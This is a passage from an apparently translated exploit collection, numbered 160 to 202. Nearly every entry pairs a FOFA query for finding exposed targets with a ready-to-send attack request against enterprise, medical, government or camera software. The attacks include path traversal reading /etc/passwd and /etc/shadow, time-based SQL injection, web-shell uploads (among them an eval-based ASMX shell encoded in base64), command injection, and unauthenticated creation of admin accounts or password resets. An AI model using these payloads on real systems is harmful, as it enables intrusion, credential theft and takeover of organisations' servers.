<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload endpoint file upload

1. Run the PoC to obtain the CSRF value, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) omni-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
